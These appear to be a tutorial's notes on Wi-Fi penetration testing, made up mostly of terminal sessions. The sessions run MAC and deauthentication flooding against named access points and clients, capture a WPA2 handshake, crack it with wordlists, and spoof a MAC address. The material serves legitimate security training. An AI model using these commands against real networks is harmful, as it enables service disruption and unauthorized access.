Wi-Fi Penetration Testing (

Wireless Network Hacking)

💀:
What you will learn ?

1. What is WiFi

2. History of WiFi

3. How Wi-Fi work

4. Types of wireless Threats

5. Wireless Hacking Methodology

1. What is WIFI

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 1

 Wireless Technology

Connecting Devices To the internet

Transmitting Radio Single as data using router

Router is connected to internet using wire / cable

Working on channels

2. History of WIFI Wireless Security Protocol

3. How WIFI work

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 2

 Range → Form 192.168.1.0 To 255.255.255.255

Router
Public

Private ( 198.168.0.1 ) Find IP

Mac

ARP ⇒ Address Resolution Protocol

4. Types of wireless Threats

Denial of Service

De - Authentication flood
Routing Attack

Access point theft

Disassociation attack
EAP-failure

Beacon flood

Authentication Flood
ARP cache poisoning attack

Power saving attacks TKIP MIC Exploit

5. Wireless Hacking Methodology

Wi-Fi Discovery

GPS Mapping

Wireless Traffic Analyst

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 3

 Launch the WIFI attack

compromise the WIFI network

WI-FI Important concepts

WI-FI Operating modes

1. Monitor Mode

2. Managed Mode

WIFI Channels

Wi-Fi Frequency

Small Bands

Medium To Communicate

2.4 GHz = 11 Channels

5 GHz = 45 Channels

WI-FI major concerns and Dangers

1. Security

2. Small

3. Health Concerns

4. Limited Band width

5. Speed

DoS on WI-FI

What You will learn

1. What is DoS Attack

2. How it work ?

3. Mac Flooding

4. Discovery Flooding

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 4

 5. De auth Flooding

3. Mac Flooding

Tools
㉿
──(hacking windows)-[~]
└─$ macof --help
macof: invalid option -- '-'
Version: 2.4
Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dpor
t]
[-i interface] [-n times]

* netdiscover

㉿
──(hacking windows)-[~]
└─$ iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wlan0 unassociated ESSID:"" Nickname:"<WIFI@REALTEK>"

Mode:Managed Frequency=2.412 GHz Access Point:
Not-Associated
Sensitivity:0/0
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid
frag:0
Tx excessive retries:0 Invalid misc:0 Missed b
eacon:0

㉿
┌──(root windows)-[/home/hacking]
└─# macof -i wlan0 -s 192.168.1.255

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 5

 27:7b:c:7a:f5:7b 38:d7:12:44:60:28 192.168.1.255.5148 > 0.
0.0.0.61071: S 1065463207:1065463207(0) win 512
f3:1a:be:20:3c:ac 8f:4a:e6:65:1a:fd 192.168.1.255.47474 >
0.0.0.0.36439: S 1392898891:1392898891(0) win 512
fa:71:f:2a:88:6a 9a:c7:bb:5:ce:cf 192.168.1.255.64664 > 0.
0.0.0.52315: S 1205853576:1205853576(0) win 512
e5:4:97:52:a7:7e 15:5e:dc:5a:b4:29 192.168.1.255.46311 > 0.
0.0.0.50431: S 964289218:964289218(0) win 512
a5:49:76:f:cd:a 5f:d4:f4:24:31:11 192.168.1.255.42384 > 0.
0.0.0.49574: S 1572234722:1572234722(0) win 512
e9:f4:2f:6:ef:d1 42:95:2:3c:4e:f2 192.168.1.255.15309 > 0.
0.0.0.16292: S 2054800207:2054800207(0) win 512
d3:2c:6a:f:24:8a ba:a:17:74:5f:a 192.168.1.255.32121 > 0.0.
0.0.50001: S 572188985:572188985(0) win 512
b0:e4:88:13:53:d0 93:18:fe:74:63:84 192.168.1.255.6238 > 0.
0.0.0.64950: S 1517543469:1517543469(0) win 512
e3:23:64:7f:47:7c 4:fc:6f:26:3b:2e 192.168.1.255.62564 > 0.
0.0.0.32639: S 1179820892:1179820892(0) win 512

4. Discovery Flooding

㉿
──(root windows)-[/home/hacking]
└─# yersinia
GNU yersinia 0.8.2 Tool
Try 'yersinia -h' to display the help.

㉿
──(root windows)-[/home/hacking]
└─# yersinia -G

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 6

 5. De-auth Flooding

㉿
──(root windows)-[/home/hacking]
└─# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wlan0 IEEE 802.11bgn ESSID:"\xF0\x9F\x91\xBD Security

Machine \xF0\x9F\x91\xBD\xF0\x9F\x98\xB1" Nickname:"<WIFI@
REALTEK>"
Mode:Managed Frequency:2.437 GHz Access Point:
FE:0A:1A:7F:98:1B
Bit Rate:87 Mb/s Sensitivity:0/0
Retry:off RTS thr:off Fragment thr:off
Encryption key:****-****-****-****-****-****-****
-**** Security mode:open
Power Management:off
Link Quality=100/100 Signal level=68/100 Noise
level=0/100
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 7

 frag:0
Tx excessive retries:0 Invalid misc:0 Missed b
eacon:0

㉿
┌──(root windows)-[/home/hacking]
└─# ifconfig wlan0 down

㉿
┌──(root windows)-[/home/hacking]
└─# iwconfig wlan0 mode monitor

㉿
──(root windows)-[/home/hacking]
└─# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wlan0 IEEE 802.11bgn ESSID:"\xF0\x9F\x91\xBD Security

Machine \xF0\x9F\x91\xBD\xF0\x9F\x98\xB1" Nickname:"<WIFI@
REALTEK>"
Mode:Monitor Frequency:2.437 GHz Access Point:
FE:0A:1A:7F:98:1B
Sensitivity:0/0
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=1/100 Signal level=1/100 Noise lev
el=0/100
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid
frag:0
Tx excessive retries:0 Invalid misc:0 Missed b
eacon:0

㉿
┌──(root windows)-[/home/hacking]
└─# ifconfig wlan0 up

㉿
┌──(root windows)-[/home/hacking]
└─# airodump-ng wlan0

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 8

 CH 11 ][ Elapsed: 1 min ][ 2023-10-29 21:20

BSSID PWR Beacons #Data, #/s CH MB E

NC CIPHER AUTH ESSID

👽 Security Machine 👽😱
FE:0A:1A:7F:98:1B -21 114 3 0 6 180 W
PA2 CCMP PSK

BSSID STATION PWR Rate Lost

Frames Notes Probes

FE:0A:1A:7F:98:1B 34:6F:24:C9:79:7D -17 1e- 1e 11

16
Quitting...

* Copy BSSID

㉿
┌──(root windows)-[/home/hacking]
└─# cd Desktop

㉿
┌──(root windows)-[/home/hacking/Desktop]
└─# airodump-ng wlan0 --bssid FE:0A:1A:7F:98:1B --channel
6 --write wifitest
21:26:34 Created capture file "wifitest-01.cap".

CH 6 ][ Elapsed: 2 mins ][ 2023-10-29 21:29

BSSID PWR RXQ Beacons #Data, #/s CH MB

ENC CIPHER AUTH ESSID

👽 👽😱
FE:0A:1A:7F:98:1B -17 0 234 5 0 6 180
WPA2 CCMP PSK Security Machine

BSSID STATION PWR Rate Lost

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 9

 Frames Notes Probes

FE:0A:1A:7F:98:1B 34:6F:24:C9:79:7D -21 0 - 1e 0

24

㉿
──(root windows)-[/home/hacking/Desktop]
└─# aireplay-ng --deauth 100 -a FE:0A:1A:7F:98:1B -c 34:6
F:24:C9:79:7D wlan0
21:31:53 Waiting for beacon frame (BSSID: FE:0A:1A:7F:98:1
B) on channel 6
21:31:54 Sending 64 directed DeAuth (code 7). STMAC: [34:6
F:24:C9:79:7D] [17|62 ACKs]
21:31:55 Sending 64 directed DeAuth (code 7). STMAC: [34:6
F:24:C9:79:7D] [ 0|64 ACKs]
21:31:56 Sending 64 directed DeAuth (code 7). STMAC: [34:6
F:24:C9:79:7D] [15|65 ACKs]
21:31:57 Sending 64 directed DeAuth (code 7). STMAC: [34:6
F:24:C9:79:7D] [ 0|63 ACKs]
21:31:58 Sending 64 directed DeAuth (code 7). STMAC: [34:6
F:24:C9:79:7D] [20|65 ACKs]
21:31:58 Sending 64 directed DeAuth (code 7). STMAC: [34:6
F:24:C9:79:7D] [ 0| 0 ACKs]
21:32:00 Sending 64 directed DeAuth (code 7). STMAC: [34:6
F:24:C9:79:7D] [ 8| 1 ACKs]

Wi-Fi Password Cracking

㉿
┌──(root windows)-[/home/hacking]
└─# ifconfig wlan0 down

㉿
┌──(root windows)-[/home/hacking]
└─# iwconfig wlan0 mode monitor

㉿
┌──(root windows)-[/home/hacking]

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 10

 └─# ifconfig wlan0 up

㉿
┌──(root windows)-[/home/hacking/Desktop]
└─# airodump-ng wlan0

CH 8 ][ Elapsed: 30 s ][ 2023-10-29 21:39

BSSID PWR Beacons #Data, #/s CH MB E

NC CIPHER AUTH ESSID

👽 👽😱
FE:0A:1A:7F:98:1B -16 51 1 0 6 180 W
PA2 CCMP PSK Security Machine

🧟 😎🧟
0C:0E:76:4D:71:54 -50 38 0 0 1 130 W
PA2 CCMP PSK Security Machine
46:D5:F2:2C:D4:6D -24 31 0 0 1 65 W
PA2 CCMP PSK Nj 5G

BSSID STATION PWR Rate Lost

Frames Notes Probes

FE:0A:1A:7F:98:1B 34:6F:24:C9:79:7D -21 1e- 1e 0

2
Quitting...

㉿
──(root windows)-[/home/hacking/Desktop/wifi test]
└─# airodump-ng --bssid FE:0A:1A:7F:98:1B --channel 6 wlan0
--write test

* WAP Handshake capcher (disc.. to one devices )

㉿
┌──(root windows)-[/home/hacking]
└─# aireplay-ng --deauth 100 -a FE:0A:1A:7F:98:1B -c 84:26:
BD:50:2D:A0 wlan0
21:53:51 Waiting for beacon frame (BSSID: FE:0A:1A:7F:98:1
B) on channel 6

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 11

 21:53:52 Sending 64 directed DeAuth (code 7). STMAC: [84:2
6:BD:50:2D:A0] [ 7|34 ACKs]
21:53:53 Sending 64 directed DeAuth (code 7). STMAC: [84:2
6:BD:50:2D:A0] [25| 0 ACKs]
21:53:53 Sending 64 directed DeAuth (code 7). STMAC: [84:2
6:BD:50:2D:A0] [ 0| 0 ACKs]

password carck with handshake file

㉿
┌──(root windows)-[/home/hacking/Desktop/wifi test]
└─# aircrack-ng test-01.cap -w /home/hacking/Desktop/rockyo
u.txt
Reading packets, please wait...
Opening test-01.cap
Read 18938 packets.

WI-FI Spoofing, IP Spoofing

㉿
──(root windows)-[/home/hacking]
└─# netdiscover

㉿
┌──(root windows)-[/home/hacking]
└─# ifconfig eth0 192.168.1.1

㉿
┌──(root windows)-[/home/hacking]
└─# ifconfig

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 12

 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.1 netmask 255.255.255.0 broadcast 192
inet6 2401:4900:3854:d822:d762:e136:6a72:a105 prefixl
inet6 fe80::a00:27ff:fe55:98e5 prefixlen 64 scopeid
inet6 2401:4900:3854:d822:a00:27ff:fe55:98e5 prefixle
ether 08:00:27:55:98:e5 txqueuelen 1000 (Ethernet)
RX packets 700 bytes 409738 (400.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 55266 bytes 3344829 (3.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisio

MAC Spoofing

㉿
┌──(root windows)-[/home/hacking]
└─# macchanger -m fe:0a:1a:7f:98:1b eth0

WI-FI MITM attack

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 13

 https://github.com/ghostop14/sparrow-wifi

㉿
──(hacking windows)-[~/Desktop/sparrow-wifi]
└─$ sudo sparrow-wifi
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/
Error updating the MAC address database. Please check if the

📶 WI fi Angry oxide Tools

https://github.com/Ragnt/AngryOxide

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 14

 ──(root ㉿windows)-[/home/hacking]
└─# angryoxide -h
Does awesome things... with wifi.

Usage: angryoxide [OPTIONS] --interface <INTERFACE>

Options:
-i, --interface <INTERFACE> Interface to use
-c, --channel <CHANNEL> Optional - Channel to scan. Wi
ll use "-c 1 -c 6 -c 11" if none specified
-b, --band <BAND> Optional - Entire band to scan
- will include all channels interface can support
-t, --target <TARGET> Optional - Target (MAC or SSI
D) to attack - will attack everything if none specified
-w, --whitelist <WHITELIST> Optional - Whitelist (MAC or S
SID) to NOT attack
-r, --rate <RATE> Optional - Attack rate (1, 2,
3 || 3 is most aggressive) [default: 2]
-o, --output <OUTPUT> Optional - Output filename
--combine Optional - Combine all hc22000 fil
es into one large file for bulk processing
--noactive Optional - Disable Active Monitor
mode
--rogue <ROGUE> Optional - Tx MAC for rogue-based
attacks - will randomize if excluded
--gpsd <GPSD> Optional - Alter default HOST:Port
for GPSD connection [default: 127.0.0.1:2947]
--autohunt Optional - AO will auto-hunt all c
hannels then lock in on the ones targets are on
--headless Optional - Set the tool to headles
s mode without a UI. (useful with --autoexit)
--autoexit Optional - AO will auto-exit when
all targets have a valid hashline
--notransmit Optional - Do not transmit - passi
ve only
--nodeauth Optional - Do NOT send deauths (wi
ll try other attacks only)
--notar Optional - Do not tar output files

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 15

 -h, --help Print help
-V, --version Print version

㉿
┌──(root windows)-[/home/hacking]
└─# angryoxide -i wlan0 --nodeauth --notransmit

㉿
┌──(root windows)-[/home/hacking]
└─# angryoxide -i wlan0 -t Nj5G

㉿
┌──(root windows)-[/home/hacking]
└─# hashcat -m 22000 nj,hc2200 wordlistfile

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 16

 RAHUL-Nj

www.linkedin.com
https://www.linkedin.com/in/rahul-kumar-ceh/

RAHUL-Nj - Overview
👍Im Ethical Hacker 😎 - An Independenet Security
Research Loves ❤️To find Security loopholes 🔐 And Patch
Them by Reporting 🔁 - RAHUL-Nj
https://github.com/RAHUL-Nj

Wi-Fi Penetration Testing ( 💀: Wireless Network Hacking) 17